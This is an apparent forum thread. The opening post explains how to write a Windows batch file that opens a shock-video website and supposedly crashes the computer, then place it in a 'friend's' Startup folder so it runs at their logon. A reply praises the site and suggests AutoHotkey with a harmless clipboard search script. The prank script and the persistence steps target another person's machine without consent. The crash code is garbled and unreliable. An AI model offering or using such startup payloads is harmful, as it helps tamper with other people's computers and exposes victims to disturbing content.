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it very un-useful programming lang you cant really do alot with it but troll friends Tongue

to make ANYTHING you need to know one thing.
that with Bat you can A-bomb a computer if you dont know what your doing.

first is first,

to make a bat file
[list type=decimal]
[*]Open up notepad(you can use notepad++ the best way to program anything)
[*]code what you want
[*]click save
[*]click file type
[*]click any file type
[*]then type your name (exp:welcome.bat)       
[/list]now here is some codes:
@echo off
start www.1man1jar.org(WARNING:THIS VIDEO IS VERY SICK)
@echo off
go to :trolled
(Crash the computer)
(to get rid of use anther profile to delete it)
now where to put these

[list type=decimal]
[*]once the file is made
[*]click start and click run(for vista and win 7 type in Run in the search bar)
[*]type in C:\Documents and Settings\yourname\Start Menu\Programs\Startup
[*]place the file in there
[*]when you "friend"logs on it will load up
have fun!
Lol dude 1man1jar is savage!

I think the idea of batch programming is so that you can make yourself quick executables that are meant to make your life a little easier. I traded in .bat for .ahk. You should check out AutoHotkey man, it's actually a tidy little program and the coding language is pretty easy. It has a good GUI to it, and can do some handy things like :

Script for auto searching any text that is copied to Clipboard (press Win + G)
#g:: ; Win+g
   Run http://www.google.com/search?q=%clipboard%
ya i might later on my dads comp it looks like something that is easy.